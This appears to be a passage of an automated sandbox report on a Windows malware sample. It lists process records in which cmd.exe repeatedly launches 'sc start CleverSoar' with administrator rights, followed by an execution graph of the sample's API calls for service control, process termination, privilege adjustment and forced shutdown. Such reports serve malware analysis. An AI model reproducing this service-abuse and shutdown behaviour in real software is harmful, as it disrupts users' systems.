                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:71
                                                        Start time:01:52:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:72
                                                        Start time:01:52:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:73
                                                        Start time:01:52:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:74
                                                        Start time:01:52:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:75
                                                        Start time:01:52:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:76
                                                        Start time:01:52:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:77
                                                        Start time:01:52:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:78
                                                        Start time:01:52:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:79
                                                        Start time:01:53:00
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:80
                                                        Start time:01:53:00
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:81
                                                        Start time:01:53:00
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:82
                                                        Start time:01:53:00
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:83
                                                        Start time:01:53:00
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:84
                                                        Start time:01:53:00
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:85
                                                        Start time:01:53:00
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:86
                                                        Start time:01:53:00
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:87
                                                        Start time:01:53:00
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:88
                                                        Start time:01:53:00
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:89
                                                        Start time:01:53:00
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:90
                                                        Start time:01:53:01
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:91
                                                        Start time:01:53:01
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:92
                                                        Start time:01:53:01
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6e8930000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:93
                                                        Start time:01:53:01
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:94
                                                        Start time:01:53:01
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:95
                                                        Start time:01:53:01
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:96
                                                        Start time:01:53:01
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:97
                                                        Start time:01:53:01
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:98
                                                        Start time:01:53:01
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:99
                                                        Start time:01:53:01
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:100
                                                        Start time:01:53:01
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:101
                                                        Start time:01:53:01
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:102
                                                        Start time:01:53:01
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:103
                                                        Start time:01:53:01
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:104
                                                        Start time:01:53:01
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:105
                                                        Start time:01:53:01
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:106
                                                        Start time:01:53:01
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:266
                                                        Start time:01:53:08
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\Conhost.exe
                                                        Wow64 process (32bit):
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:
                                                        Has administrator privileges:
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:1.6%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:15.4%
                                                          Total number of Nodes:824
                                                          Total number of Limit Nodes:9
                                                          execution_graph 100190 6c52f150 100192 6c52efbe 100190->100192 100191 6c52f243 CreateFileA 100193 6c52f2a7 100191->100193 100192->100191 100194 6c5302ca 100193->100194 100195 6c5302ac GetCurrentProcess TerminateProcess 100193->100195 100195->100194 100196 6c514b53 100354 6c696a43 100196->100354 100198 6c514b5c _Yarn 100368 6c68aec0 100198->100368 100200 6c53639e 100466 6c6a0130 18 API calls 2 library calls 100200->100466 100202 6c514cff 100203 6c515164 CreateFileA CloseHandle 100208 6c5151ec 100203->100208 100204 6c514bae std::ios_base::_Ios_base_dtor 100204->100200 100204->100202 100204->100203 100205 6c52245a _Yarn _strlen 100204->100205 100205->100200 100207 6c68aec0 2 API calls 100205->100207 100221 6c522a83 std::ios_base::_Ios_base_dtor 100207->100221 100374 6c695120 OpenSCManagerA 100208->100374 100210 6c51fc00 100459 6c695240 CreateToolhelp32Snapshot 100210->100459 100212 6c696a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100227 6c515478 std::ios_base::_Ios_base_dtor _Yarn _strlen 100212->100227 100215 6c68aec0 2 API calls 100215->100227 100216 6c5237d0 Sleep 100231 6c5237e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 100216->100231 100217 6c5363b2 100467 6c5115e0 18 API calls std::ios_base::_Ios_base_dtor 100217->100467 100218 6c695240 4 API calls 100225 6c52053a 100218->100225 100219 6c695240 4 API calls 100250 6c5212e2 100219->100250 100221->100200 100378 6c680390 100221->100378 100222 6c5364f8 100223 6c51ffe3 100223->100218 100232 6c520abc 100223->100232 100224 6c536ba0 104 API calls 100224->100227 100229 6c695240 4 API calls 100225->100229 100225->100232 100226 6c536e60 32 API calls 100226->100227 100227->100200 100227->100210 100227->100212 100227->100215 100227->100224 100227->100226 100239 6c516722 100227->100239 100244 6c516162 100227->100244 100416 6c537090 100227->100416 100429 6c55e010 100227->100429 100229->100232 100230 6c51740b 100436 6c694ff0 CreateProcessA 100230->100436 100231->100200 100236 6c68aec0 2 API calls 100231->100236 100251 6c537090 77 API calls 100231->100251 100252 6c55e010 67 API calls 100231->100252 100387 6c536ba0 100231->100387 100406 6c536e60 100231->100406 100232->100205 100232->100219 100234 6c695240 4 API calls 100247 6c521dd9 100234->100247 100235 6c52241a 100240 6c680390 11 API calls 100235->100240 100236->100231 100238 6c52211c 100238->100205 100238->100235 100435 6c691880 25 API calls 4 library calls 100239->100435 100241 6c52244d 100240->100241 100465 6c695d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 100241->100465 100243 6c522452 Sleep 100243->100205 100246 6c695240 4 API calls 100246->100238 100247->100238 100247->100246 100250->100234 100250->100238 100253 6c5216ac 100250->100253 100251->100231 100252->100231 100254 6c51775a _strlen 100254->100200 100255 6c517b92 100254->100255 100256 6c517ba9 100254->100256 100259 6c517b43 _Yarn 100254->100259 100257 6c696a43 std::_Facet_Register 4 API calls 100255->100257 100258 6c696a43 std::_Facet_Register 4 API calls 100256->100258 100257->100259 100258->100259 100260 6c68aec0 2 API calls 100259->100260 100269 6c517be7 std::ios_base::_Ios_base_dtor 100260->100269 100261 6c694ff0 4 API calls 100272 6c518a07 100261->100272 100262 6c519d68 100265 6c696a43 std::_Facet_Register 4 API calls 100262->100265 100263 6c519d7f 100266 6c696a43 std::_Facet_Register 4 API calls 100263->100266 100264 6c51962c _strlen 100264->100200 100264->100262 100264->100263 100267 6c519d18 _Yarn 100264->100267 100265->100267 100266->100267 100268 6c68aec0 2 API calls 100267->100268 100275 6c519dbd std::ios_base::_Ios_base_dtor 100268->100275 100269->100200 100269->100261 100269->100264 100270 6c518387 100269->100270 100271 6c694ff0 4 API calls 100280 6c519120 100271->100280 100272->100271 100273 6c694ff0 4 API calls 100290 6c51a215 _strlen 100273->100290 100274 6c694ff0 4 API calls 100276 6c519624 100274->100276 100275->100200 100275->100273 100283 6c51e8b5 std::ios_base::_Ios_base_dtor _Yarn _strlen 100275->100283 100440 6c695d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 100276->100440 100277 6c696a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100277->100283 100279 6c68aec0 2 API calls 100279->100283 100280->100274 100281 6c51f7b1 100458 6c695d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 100281->100458 100282 6c51ed02 Sleep 100302 6c51e8c1 100282->100302 100283->100200 100283->100277 100283->100279 100283->100281 100283->100282 100285 6c51e8dd GetCurrentProcess TerminateProcess 100285->100283 100286 6c51a9a4 100288 6c696a43 std::_Facet_Register 4 API calls 100286->100288 100287 6c51a9bb 100289 6c696a43 std::_Facet_Register 4 API calls 100287->100289 100297 6c51a953 _Yarn _strlen 100288->100297 100289->100297 100290->100200 100290->100286 100290->100287 100290->100297 100291 6c694ff0 4 API calls 100291->100302 100292 6c51fbb8 100294 6c51fbe8 ExitWindowsEx Sleep 100292->100294 100293 6c51f7c0 100293->100292 100294->100210 100295 6c51aff0 100298 6c696a43 std::_Facet_Register 4 API calls 100295->100298 100296 6c51b009 100299 6c696a43 std::_Facet_Register 4 API calls 100296->100299 100297->100217 100297->100295 100297->100296 100300 6c51afa0 _Yarn 100297->100300 100298->100300 100299->100300 100441 6c695960 100300->100441 100302->100283 100302->100285 100302->100291 100303 6c51b059 std::ios_base::_Ios_base_dtor _strlen 100303->100200 100304 6c51b443 100303->100304 100305 6c51b42c 100303->100305 100308 6c51b3da _Yarn _strlen 100303->100308 100307 6c696a43 std::_Facet_Register 4 API calls 100304->100307 100306 6c696a43 std::_Facet_Register 4 API calls 100305->100306 100306->100308 100307->100308 100308->100217 100309 6c51b7b7 100308->100309 100310 6c51b79e 100308->100310 100313 6c51b751 _Yarn 100308->100313 100311 6c696a43 std::_Facet_Register 4 API calls 100309->100311 100312 6c696a43 std::_Facet_Register 4 API calls 100310->100312 100311->100313 100312->100313 100314 6c695960 104 API calls 100313->100314 100315 6c51b804 std::ios_base::_Ios_base_dtor _strlen 100314->100315 100315->100200 100316 6c51bc26 100315->100316 100317 6c51bc0f 100315->100317 100320 6c51bbbd _Yarn _strlen 100315->100320 100319 6c696a43 std::_Facet_Register 4 API calls 100316->100319 100318 6c696a43 std::_Facet_Register 4 API calls 100317->100318 100318->100320 100319->100320 100320->100217 100321 6c51c075 100320->100321 100322 6c51c08e 100320->100322 100325 6c51c028 _Yarn 100320->100325 100323 6c696a43 std::_Facet_Register 4 API calls 100321->100323 100324 6c696a43 std::_Facet_Register 4 API calls 100322->100324 100323->100325 100324->100325 100326 6c695960 104 API calls 100325->100326 100331 6c51c0db std::ios_base::_Ios_base_dtor _strlen 100326->100331 100327 6c51c7a5 100329 6c696a43 std::_Facet_Register 4 API calls 100327->100329 100328 6c51c7bc 100330 6c696a43 std::_Facet_Register 4 API calls 100328->100330 100338 6c51c753 _Yarn _strlen 100329->100338 100330->100338 100331->100200 100331->100327 100331->100328 100331->100338 100332 6c51d406 100335 6c696a43 std::_Facet_Register 4 API calls 100332->100335 100333 6c51d3ed 100334 6c696a43 std::_Facet_Register 4 API calls 100333->100334 100336 6c51d39a _Yarn 100334->100336 100335->100336 100337 6c695960 104 API calls 100336->100337 100339 6c51d458 std::ios_base::_Ios_base_dtor _strlen 100337->100339 100338->100217 100338->100332 100338->100333 100338->100336 100344 6c51cb2f 100338->100344 100339->100200 100340 6c51d8a4 100339->100340 100341 6c51d8bb 100339->100341 100345 6c51d852 _Yarn _strlen 100339->100345 100342 6c696a43 std::_Facet_Register 4 API calls 100340->100342 100343 6c696a43 std::_Facet_Register 4 API calls 100341->100343 100342->100345 100343->100345 100345->100217 100346 6c51dcb6 100345->100346 100347 6c51dccf 100345->100347 100350 6c51dc69 _Yarn 100345->100350 100348 6c696a43 std::_Facet_Register 4 API calls 100346->100348 100349 6c696a43 std::_Facet_Register 4 API calls 100347->100349 100348->100350 100349->100350 100351 6c695960 104 API calls 100350->100351 100353 6c51dd1c std::ios_base::_Ios_base_dtor 100351->100353 100352 6c694ff0 4 API calls 100352->100283 100353->100200 100353->100352 100355 6c696a48 100354->100355 100356 6c696a62 100355->100356 100359 6c696a64 std::_Facet_Register 100355->100359 100468 6c69f014 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100355->100468 100356->100198 100358 6c6978c3 std::_Facet_Register 100472 6c699379 RaiseException 100358->100472 100359->100358 100469 6c699379 RaiseException 100359->100469 100362 6c6980bc IsProcessorFeaturePresent 100367 6c6980e1 100362->100367 100363 6c697883 100470 6c699379 RaiseException 100363->100470 100365 6c6978a3 std::invalid_argument::invalid_argument 100471 6c699379 RaiseException 100365->100471 100367->100198 100369 6c68aed4 100368->100369 100370 6c68aed6 FindFirstFileA 100368->100370 100369->100370 100371 6c68af10 100370->100371 100372 6c68af14 FindClose 100371->100372 100373 6c68af72 100371->100373 100372->100371 100373->100204 100376 6c695156 100374->100376 100375 6c6951e8 OpenServiceA 100375->100376 100376->100375 100377 6c69522f 100376->100377 100377->100227 100384 6c6803a3 _Yarn __wsopen_s std::locale::_Setgloballocale _strlen 100378->100384 100379 6c68310e CloseHandle 100379->100384 100380 6c683f5f CloseHandle 100380->100384 100381 6c5237cb 100386 6c695d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 100381->100386 100382 6c66c1e0 WriteFile WriteFile WriteFile ReadFile 100382->100384 100383 6c68251b CloseHandle 100383->100384 100384->100379 100384->100380 100384->100381 100384->100382 100384->100383 100473 6c66b730 100384->100473 100386->100216 100388 6c536bd5 100387->100388 100484 6c562020 100388->100484 100390 6c536c68 100391 6c696a43 std::_Facet_Register 4 API calls 100390->100391 100392 6c536ca0 100391->100392 100501 6c697327 100392->100501 100394 6c536cb4 100513 6c561d90 100394->100513 100397 6c536d8e 100397->100231 100399 6c536dc8 100521 6c5626e0 24 API calls 4 library calls 100399->100521 100401 6c536dda 100522 6c699379 RaiseException 100401->100522 100403 6c536def 100404 6c55e010 67 API calls 100403->100404 100405 6c536e0f 100404->100405 100405->100231 100407 6c536e9f 100406->100407 100410 6c536eb3 100407->100410 100917 6c563560 32 API calls std::_Xinvalid_argument 100407->100917 100412 6c536f5b 100410->100412 100919 6c562250 30 API calls 100410->100919 100920 6c5626e0 24 API calls 4 library calls 100410->100920 100921 6c699379 RaiseException 100410->100921 100413 6c536f6e 100412->100413 100918 6c5637e0 32 API calls std::_Xinvalid_argument 100412->100918 100413->100231 100417 6c53709e 100416->100417 100421 6c5370d1 100416->100421 100922 6c5601f0 100417->100922 100419 6c537183 100419->100227 100421->100419 100926 6c562250 30 API calls 100421->100926 100422 6c6a0b18 67 API calls 100422->100421 100424 6c5371ae 100927 6c562340 24 API calls 100424->100927 100426 6c5371be 100928 6c699379 RaiseException 100426->100928 100428 6c5371c9 100431 6c55e04b 100429->100431 100430 6c55e0a3 100430->100227 100431->100430 100432 6c5601f0 64 API calls 100431->100432 100433 6c55e098 100432->100433 100434 6c6a0b18 67 API calls 100433->100434 100434->100430 100435->100230 100437 6c6950ca 100436->100437 100438 6c695080 WaitForSingleObject CloseHandle CloseHandle 100437->100438 100439 6c6950e3 100437->100439 100438->100437 100439->100254 100440->100264 100442 6c6959b7 100441->100442 100974 6c695ff0 100442->100974 100444 6c6959c8 100445 6c536ba0 104 API calls 100444->100445 100455 6c6959ec 100445->100455 100446 6c695a67 100447 6c55e010 67 API calls 100446->100447 100448 6c695a9f std::ios_base::_Ios_base_dtor 100447->100448 